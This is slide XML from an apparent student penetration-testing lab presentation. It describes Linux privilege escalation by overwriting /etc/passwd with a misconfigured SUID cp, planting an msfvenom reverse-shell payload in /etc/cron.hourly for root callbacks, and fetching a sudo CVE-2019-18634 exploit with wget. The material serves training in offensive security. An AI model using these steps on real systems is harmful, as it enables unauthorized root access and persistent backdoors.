                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Story 2 (Our Demonstration)</a:t>
            </a:r>
            <a:endParaRPr sz="2800" i="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2800" i="1">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800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>An insider attacker (Internal) with a goal to change the salary due to the attacker not happy with that and want to change it. The second attack which is from the inside is with the use of AD, either the kerboros or whatever get the thing change the pay</a:t>
            </a:r>
            <a:endParaRPr sz="2800" i="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>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b9f1380cfe_1_82"/>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Interesting findings </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="428" name="Google Shape;428;gb9f1380cfe_1_82"/>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r>
              <a:rPr lang="en-US"/>
              <a:t>it seems that there is a misconfigured SUID file cp, as well as a vulnerable sudo program. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="429" name="Google Shape;429;gb9f1380cfe_1_82"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="665175" y="1917625"/>
            <a:ext cx="3990975" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="430" name="Google Shape;430;gb9f1380cfe_1_82"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="665175" y="2743200"/>
            <a:ext cx="4581525" cy="685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b9f1380cfe_1_90"/>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Misconfigured SUID file</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="437" name="Google Shape;437;gb9f1380cfe_1_90"/>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find / -perm -u=s -type f 2&gt;/dev/null</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>we can also see that cp is under it</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>so i'm going to make use of this to change the content of the passwd file and get to root. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="438" name="Google Shape;438;gb9f1380cfe_1_90"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="665600" y="2368550"/>
            <a:ext cx="752475" cy="209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b9f1380cfe_1_98"/>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45" name="Google Shape;445;gb9f1380cfe_1_98"/>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First i will need to know the original passwd file, so i will use </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>nano /etc/passwd</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>and copy a exact copy into tmp called fakewd, </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>and use the openssl program in kali linux to create a hashed password etc.  And add it to the bottom of the fakewd</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="446" name="Google Shape;446;gb9f1380cfe_1_98"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="552875" y="4667350"/>
            <a:ext cx="4657725" cy="7429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b9f1380cfe_1_106"/>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53" name="Google Shape;453;gb9f1380cfe_1_106"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="454" name="Google Shape;454;gb9f1380cfe_1_106"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="747713" y="61913"/>
            <a:ext cx="7648575" cy="6734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b9f1380cfe_1_114"/>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61" name="Google Shape;461;gb9f1380cfe_1_114"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="462" name="Google Shape;462;gb9f1380cfe_1_114"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="566738" y="1152525"/>
            <a:ext cx="8010525" cy="4552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b9f1380cfe_1_121"/>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69" name="Google Shape;469;gb9f1380cfe_1_121"/>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now that we have the fake passwd, we can make use of the cp to copy and overwrite the fake with the real. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>cp fakewd /etc/passwd</a:t>
            </a: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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>and from it, just use su to go to the account and ta da, we will get root. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="470" name="Google Shape;470;gb9f1380cfe_1_121"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="665600" y="3187750"/>
            <a:ext cx="3009900" cy="685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b9f1380cfe_1_129"/>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backdoor with cp</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="477" name="Google Shape;477;gb9f1380cfe_1_129"/>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Other then that, i can also make use of cp to install a backdoor in the machine. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Firstly, lets create a payload with msfvenom. </a:t>
            </a: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r>
              <a:rPr lang="en-US"/>
              <a:t>and create a file in tmp and name it dave.sh</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="478" name="Google Shape;478;gb9f1380cfe_1_129"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="774875" y="3049638"/>
            <a:ext cx="7562850" cy="962025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="479" name="Google Shape;479;gb9f1380cfe_1_129"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="665175" y="4679625"/>
            <a:ext cx="8105775" cy="838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gb9f1380cfe_1_137"/>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86" name="Google Shape;486;gb9f1380cfe_1_137"/>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Now we are all aware of the Linux crontab utility that runs files hourly, daily, weekly and monthly, so I copied dave.sh to /etc/cron.hourly, so it will run dave.sh after one hour.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>cp dave.sh /etc/cron.hourly/</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="487" name="Google Shape;487;gb9f1380cfe_1_137"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="665600" y="3890475"/>
            <a:ext cx="4343400" cy="990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b9f1380cfe_1_146"/>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94" name="Google Shape;494;gb9f1380cfe_1_146"/>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And once a hour passes, </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>the web server will get a connection from the mail server</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>as root.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b9f1380cfe_1_152"/>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Sudo </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="501" name="Google Shape;501;gb9f1380cfe_1_152"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="665175" y="1651000"/>
            <a:ext cx="7477200" cy="43614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As the last resort, by looking up the sudo program with that version, there is some exploits more specific the 2019-18634 CVE bss overflow. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Which from just now, we use wget to get the needed exploit file from the web server to the mail server. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="48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a95cb10b87_0_7"/>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Project Specification</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="208" name="Google Shape;208;ga95cb10b87_0_7"/>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457200" lvl="0" indent="-457200" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1"/>
              <a:t>Requirements of the project</a:t>
            </a:r>
            <a:endParaRPr sz="2800" i="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1"/>
              <a:t>→ Kali Linux targeting a victim machine running on Linux or/and Ubuntu</a:t>
            </a:r>
            <a:endParaRPr sz="1800" i="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1"/>
              <a:t>→ Use of any tool to perform an attack using Metasploit, Bash/Shell code, etc</a:t>
            </a:r>
            <a:endParaRPr sz="1800" i="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1"/>
              <a:t>→ Use Website &amp; OS exploitations to get root and compromise the system</a:t>
            </a:r>
            <a:endParaRPr sz="1800" i="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1"/>
              <a:t>→ Exploiting the AD server via Zerologon &amp; Kerberos Golden ticket</a:t>
            </a:r>
            <a:endParaRPr sz="1800" i="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800" i="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1"/>
              <a:t>Breakdown of the requirements</a:t>
            </a:r>
            <a:endParaRPr sz="2800" i="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1"/>
              <a:t> → Exploit Website (File upload, XSS, XSRF, SQL injection, etc)</a:t>
            </a:r>
            <a:endParaRPr sz="1800" i="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1"/>
              <a:t>→ Buffer overflow, Dirty Cow</a:t>
            </a:r>
            <a:endParaRPr sz="1800" i="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1"/>
              <a:t>→ Privilege escalation</a:t>
            </a:r>
            <a:endParaRPr sz="1800" i="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1"/>
              <a:t>→ Pivoting</a:t>
            </a:r>
            <a:endParaRPr sz="1800" i="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1"/>
              <a:t>→ Misconfiguration</a:t>
            </a:r>
            <a:endParaRPr sz="1800" i="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800" i="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800" i="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ba014e31c3_2_0"/>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Cracking sudo </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="508" name="Google Shape;508;gba014e31c3_2_0"/>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To crack sudo, first thing that i need to do is to replicate a situation exactly like the one in the mail server. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>(change to sudowudo)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> So, in order to debug sudo binary, we will be using the gdb debugger.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gba014e31c3_2_6"/>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Cracking sudo</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="515" name="Google Shape;515;gba014e31c3_2_6"/>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Debugging sudo is extremely hard The main factors is that it requires setuid to run, and that running sudo as root bypasses the password prompt. So basically, we needed to run sudo as a normal user, but debug it as root. It would be relatively trivial to attach a debugger to this, however the bug occurs at the first (and last) prompt the program displays, and requires input be sent via a non-writeable source (aka not user input).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gba014e31c3_2_13"/>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Cracking sudo</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="522" name="Google Shape;522;gba014e31c3_2_13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="665175" y="1651000"/>
            <a:ext cx="7477200" cy="477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So, to settle that i will need to create a program that pauses and allows me to attach to that program using gdb. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>While at the same time crashing the sudo binary so that we can take a look at what is going on.  </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
